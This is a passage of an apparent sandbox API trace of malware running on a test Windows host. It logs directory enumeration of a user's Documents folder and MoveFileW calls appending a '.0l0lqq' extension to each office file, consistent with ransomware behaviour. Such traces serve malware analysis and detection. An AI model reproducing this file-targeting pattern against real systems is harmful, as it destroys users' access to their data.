ftLastWriteTime.dwLowDateTime=0xad1cacd0, ftLastWriteTime.dwHighDateTime=0x1d567ca, nFileSizeHigh=0x0, nFileSizeLow=0xea8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="_sXODdA_.docx", cAlternateFileName="_SXODD~1.DOC")) returned 0 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda424400, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda424400, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1295e80, ftCreationTime.dwHighDateTime=0x1d597b9, ftLastAccessTime.dwLowDateTime=0xcbf6980, ftLastAccessTime.dwHighDateTime=0x1d5ceae, ftLastWriteTime.dwLowDateTime=0xcbf6980, ftLastWriteTime.dwHighDateTime=0x1d5ceae, nFileSizeHigh=0x0, nFileSizeLow=0xd007, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fUWNzah9eDSoo9.docx", cAlternateFileName="1FUWNZ~1.DOC")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fcd9a30, ftCreationTime.dwHighDateTime=0x1d5adc1, ftLastAccessTime.dwLowDateTime=0xe8342d30, ftLastAccessTime.dwHighDateTime=0x1d592e4, ftLastWriteTime.dwLowDateTime=0xe8342d30, ftLastWriteTime.dwHighDateTime=0x1d592e4, nFileSizeHigh=0x0, nFileSizeLow=0xd244, dwReserved0=0x0, dwReserved1=0x0, cFileName="4KwM.xlsx", cAlternateFileName="4KWM~1.XLS")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec732e60, ftCreationTime.dwHighDateTime=0x1d5a788, ftLastAccessTime.dwLowDateTime=0x17222390, ftLastAccessTime.dwHighDateTime=0x1d5cb16, ftLastWriteTime.dwLowDateTime=0x17222390, ftLastWriteTime.dwHighDateTime=0x1d5cb16, nFileSizeHigh=0x0, nFileSizeLow=0x35d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4TIpwdkjwo9LNE.xlsx", cAlternateFileName="4TIPWD~1.XLS")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c851b0, ftCreationTime.dwHighDateTime=0x1d55e4b, ftLastAccessTime.dwLowDateTime=0x125e1e20, ftLastAccessTime.dwHighDateTime=0x1d564d4, ftLastWriteTime.dwLowDateTime=0x125e1e20, ftLastWriteTime.dwHighDateTime=0x1d564d4, nFileSizeHigh=0x0, nFileSizeLow=0x10021, dwReserved0=0x0, dwReserved1=0x0, cFileName="5dKx88Jk -aA- 3njE.xlsx", cAlternateFileName="5DKX88~1.XLS")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd623e2e0, ftCreationTime.dwHighDateTime=0x1d5e7c4, ftLastAccessTime.dwLowDateTime=0xfc241aa0, ftLastAccessTime.dwHighDateTime=0x1d55e8a, ftLastWriteTime.dwLowDateTime=0xfc241aa0, ftLastWriteTime.dwHighDateTime=0x1d55e8a, nFileSizeHigh=0x0, nFileSizeLow=0x12a57, dwReserved0=0x0, dwReserved1=0x0, cFileName="7WoYYB3aZvCLN1pJ.xlsx", cAlternateFileName="7WOYYB~1.XLS")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c59720, ftCreationTime.dwHighDateTime=0x1d57fc5, ftLastAccessTime.dwLowDateTime=0xe1b08300, ftLastAccessTime.dwHighDateTime=0x1d57507, ftLastWriteTime.dwLowDateTime=0xe1b08300, ftLastWriteTime.dwHighDateTime=0x1d57507, nFileSizeHigh=0x0, nFileSizeLow=0x18197, dwReserved0=0x0, dwReserved1=0x0, cFileName="8dtTXcdZNIX0EkpZ0Bd.pptx", cAlternateFileName="8DTTXC~1.PPT")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee1dd330, ftCreationTime.dwHighDateTime=0x1d5e628, ftLastAccessTime.dwLowDateTime=0x9fdb67d0, ftLastAccessTime.dwHighDateTime=0x1d5ba1a, ftLastWriteTime.dwLowDateTime=0x9fdb67d0, ftLastWriteTime.dwHighDateTime=0x1d5ba1a, nFileSizeHigh=0x0, nFileSizeLow=0xe2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bJ tIzZSNluSYKA.docx", cAlternateFileName="BJTIZZ~1.DOC")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa450c880, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0x6bdd7f20, ftLastAccessTime.dwHighDateTime=0x1d5e76c, ftLastWriteTime.dwLowDateTime=0x6bdd7f20, ftLastWriteTime.dwHighDateTime=0x1d5e76c, nFileSizeHigh=0x0, nFileSizeLow=0x376d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ckaZojHAXod2.docx", cAlternateFileName="CKAZOJ~1.DOC")) returned 1 [0255.463] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12ba9f80, ftCreationTime.dwHighDateTime=0x1d5e709, ftLastAccessTime.dwLowDateTime=0x2c4cca40, ftLastAccessTime.dwHighDateTime=0x1d5e6a5, ftLastWriteTime.dwLowDateTime=0x2c4cca40, ftLastWriteTime.dwHighDateTime=0x1d5e6a5, nFileSizeHigh=0x0, nFileSizeLow=0x13e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="ee6Hfjbp_ b.rtf", cAlternateFileName="EE6HFJ~1.RTF")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96ff0a70, ftCreationTime.dwHighDateTime=0x1d5e695, ftLastAccessTime.dwLowDateTime=0xcca58910, ftLastAccessTime.dwHighDateTime=0x1d5a8e7, ftLastWriteTime.dwLowDateTime=0xcca58910, ftLastWriteTime.dwHighDateTime=0x1d5a8e7, nFileSizeHigh=0x0, nFileSizeLow=0xc70b, dwReserved0=0x0, dwReserved1=0x0, cFileName="EQ0aEApyX.pptx", cAlternateFileName="EQ0AEA~1.PPT")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594875f0, ftCreationTime.dwHighDateTime=0x1d5b72d, ftLastAccessTime.dwLowDateTime=0x88cc9dd0, ftLastAccessTime.dwHighDateTime=0x1d5a0ba, ftLastWriteTime.dwLowDateTime=0x88cc9dd0, ftLastWriteTime.dwHighDateTime=0x1d5a0ba, nFileSizeHigh=0x0, nFileSizeLow=0x80cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="g5mq.docx", cAlternateFileName="G5MQ~1.DOC")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x732e310, ftCreationTime.dwHighDateTime=0x1d59552, ftLastAccessTime.dwLowDateTime=0x473bfd60, ftLastAccessTime.dwHighDateTime=0x1d5b925, ftLastWriteTime.dwLowDateTime=0x473bfd60, ftLastWriteTime.dwHighDateTime=0x1d5b925, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="ID7sZ-DbPR.pptx", cAlternateFileName="ID7SZ-~1.PPT")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9df7f50, ftCreationTime.dwHighDateTime=0x1d5db9e, ftLastAccessTime.dwLowDateTime=0xce4ad520, ftLastAccessTime.dwHighDateTime=0x1d5ceb9, ftLastWriteTime.dwLowDateTime=0xce4ad520, ftLastWriteTime.dwHighDateTime=0x1d5ceb9, nFileSizeHigh=0x0, nFileSizeLow=0x6456, dwReserved0=0x0, dwReserved1=0x0, cFileName="MGuoFKDzVd7lgyb_t.pptx", cAlternateFileName="MGUOFK~1.PPT")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac6df90, ftCreationTime.dwHighDateTime=0x1d5e5b8, ftLastAccessTime.dwLowDateTime=0xd52bdd90, ftLastAccessTime.dwHighDateTime=0x1d5e56f, ftLastWriteTime.dwLowDateTime=0xd52bdd90, ftLastWriteTime.dwHighDateTime=0x1d5e56f, nFileSizeHigh=0x0, nFileSizeLow=0x13559, dwReserved0=0x0, dwReserved1=0x0, cFileName="msAyTmF2yMxw3d92t.pptx", cAlternateFileName="MSAYTM~1.PPT")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b61a510, ftCreationTime.dwHighDateTime=0x1d57c38, ftLastAccessTime.dwLowDateTime=0x9edec400, ftLastAccessTime.dwHighDateTime=0x1d5c4bd, ftLastWriteTime.dwLowDateTime=0x9edec400, ftLastWriteTime.dwHighDateTime=0x1d5c4bd, nFileSizeHigh=0x0, nFileSizeLow=0x202c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NyqimoSd7l319bg3F.docx", cAlternateFileName="NYQIMO~1.DOC")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0522620, ftCreationTime.dwHighDateTime=0x1d5e7da, ftLastAccessTime.dwLowDateTime=0x9e6de2c0, ftLastAccessTime.dwHighDateTime=0x1d5df35, ftLastWriteTime.dwLowDateTime=0x9e6de2c0, ftLastWriteTime.dwHighDateTime=0x1d5df35, nFileSizeHigh=0x0, nFileSizeLow=0x18e82, dwReserved0=0x0, dwReserved1=0x0, cFileName="RB7vKe4dGF-QVWZ3.xls", cAlternateFileName="RB7VKE~1.XLS")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14540ff0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xb8b09c80, ftLastAccessTime.dwHighDateTime=0x1d5e008, ftLastWriteTime.dwLowDateTime=0xb8b09c80, ftLastWriteTime.dwHighDateTime=0x1d5e008, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TbcTIVyGuBBLe7", cAlternateFileName="TBCTIV~1")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1350870, ftCreationTime.dwHighDateTime=0x1d59f3a, ftLastAccessTime.dwLowDateTime=0xb8d15240, ftLastAccessTime.dwHighDateTime=0x1d571db, ftLastWriteTime.dwLowDateTime=0xb8d15240, ftLastWriteTime.dwHighDateTime=0x1d571db, nFileSizeHigh=0x0, nFileSizeLow=0x12a3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="UNiICeYoMbvR-uhvCAQg.pptx", cAlternateFileName="UNIICE~1.PPT")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37663d30, ftCreationTime.dwHighDateTime=0x1d58723, ftLastAccessTime.dwLowDateTime=0xc831b110, ftLastAccessTime.dwHighDateTime=0x1d5db64, ftLastWriteTime.dwLowDateTime=0xc831b110, ftLastWriteTime.dwHighDateTime=0x1d5db64, nFileSizeHigh=0x0, nFileSizeLow=0x11f7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ys1suZFVNZW7SmZSMrC1.xlsx", cAlternateFileName="YS1SUZ~1.XLS")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52513470, ftCreationTime.dwHighDateTime=0x1d5b9f4, ftLastAccessTime.dwLowDateTime=0xad1cacd0, ftLastAccessTime.dwHighDateTime=0x1d567ca, ftLastWriteTime.dwLowDateTime=0xad1cacd0, ftLastWriteTime.dwHighDateTime=0x1d567ca, nFileSizeHigh=0x0, nFileSizeLow=0xea8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="_sXODdA_.docx", cAlternateFileName="_SXODD~1.DOC")) returned 1 [0255.464] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0255.466] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fUWNzah9eDSoo9.docx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fUWNzah9eDSoo9.docx", lpFilePart=0x0) returned 0x3c [0255.471] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fUWNzah9eDSoo9.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1fuwnzah9edsoo9.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1fUWNzah9eDSoo9.docx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\1fuwnzah9edsoo9.docx.0l0lqq")) returned 1 [0255.474] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4KwM.xlsx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4KwM.xlsx", lpFilePart=0x0) returned 0x31 [0255.480] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4KwM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4kwm.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4KwM.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4kwm.xlsx.0l0lqq")) returned 1 [0255.482] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4TIpwdkjwo9LNE.xlsx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4TIpwdkjwo9LNE.xlsx", lpFilePart=0x0) returned 0x3b [0255.486] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4TIpwdkjwo9LNE.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4tipwdkjwo9lne.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4TIpwdkjwo9LNE.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4tipwdkjwo9lne.xlsx.0l0lqq")) returned 1 [0255.490] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dKx88Jk -aA- 3njE.xlsx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dKx88Jk -aA- 3njE.xlsx", lpFilePart=0x0) returned 0x40 [0255.504] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dKx88Jk -aA- 3njE.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dkx88jk -aa- 3nje.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5dKx88Jk -aA- 3njE.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5dkx88jk -aa- 3nje.xlsx.0l0lqq")) returned 1 [0255.507] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7WoYYB3aZvCLN1pJ.xlsx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7WoYYB3aZvCLN1pJ.xlsx", lpFilePart=0x0) returned 0x3d [0255.514] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7WoYYB3aZvCLN1pJ.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7woyyb3azvcln1pj.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7WoYYB3aZvCLN1pJ.xlsx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7woyyb3azvcln1pj.xlsx.0l0lqq")) returned 1 [0255.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8dtTXcdZNIX0EkpZ0Bd.pptx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8dtTXcdZNIX0EkpZ0Bd.pptx", lpFilePart=0x0) returned 0x40 [0255.528] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8dtTXcdZNIX0EkpZ0Bd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8dttxcdznix0ekpz0bd.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8dtTXcdZNIX0EkpZ0Bd.pptx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8dttxcdznix0ekpz0bd.pptx.0l0lqq")) returned 1 [0255.538] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bJ tIzZSNluSYKA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bj tizzsnlusyka.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bJ tIzZSNluSYKA.docx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bj tizzsnlusyka.docx.0l0lqq")) returned 1 [0255.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ckaZojHAXod2.docx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ckaZojHAXod2.docx", lpFilePart=0x0) returned 0x39 [0255.547] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ckaZojHAXod2.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ckazojhaxod2.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ckaZojHAXod2.docx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ckazojhaxod2.docx.0l0lqq")) returned 1 [0255.561] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ee6Hfjbp_ b.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ee6hfjbp_ b.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ee6Hfjbp_ b.rtf.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ee6hfjbp_ b.rtf.0l0lqq")) returned 1 [0255.571] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EQ0aEApyX.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eq0aeapyx.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EQ0aEApyX.pptx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eq0aeapyx.pptx.0l0lqq")) returned 1 [0255.574] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g5mq.docx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g5mq.docx", lpFilePart=0x0) returned 0x31 [0255.578] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g5mq.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g5mq.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g5mq.docx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g5mq.docx.0l0lqq")) returned 1 [0255.580] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ID7sZ-DbPR.pptx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ID7sZ-DbPR.pptx", lpFilePart=0x0) returned 0x37 [0255.586] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ID7sZ-DbPR.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\id7sz-dbpr.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ID7sZ-DbPR.pptx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\id7sz-dbpr.pptx.0l0lqq")) returned 1 [0255.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MGuoFKDzVd7lgyb_t.pptx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MGuoFKDzVd7lgyb_t.pptx", lpFilePart=0x0) returned 0x3e [0255.593] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MGuoFKDzVd7lgyb_t.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mguofkdzvd7lgyb_t.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\MGuoFKDzVd7lgyb_t.pptx.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mguofkdzvd7lgyb_t.pptx.0l0lqq")) returned 1 [0255.597] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\msAyTmF2yMxw3d92t.pptx", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\msAyTmF2yMxw3d92t.pptx", lpFilePart=0x0) returned 0x3e [0255.607] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\msAyTmF2yMxw3d92t.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\msaytmf2ymxw3d92t.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\msAyTmF2yMxw3d92t.pptx.0l0lqq" (normalized: 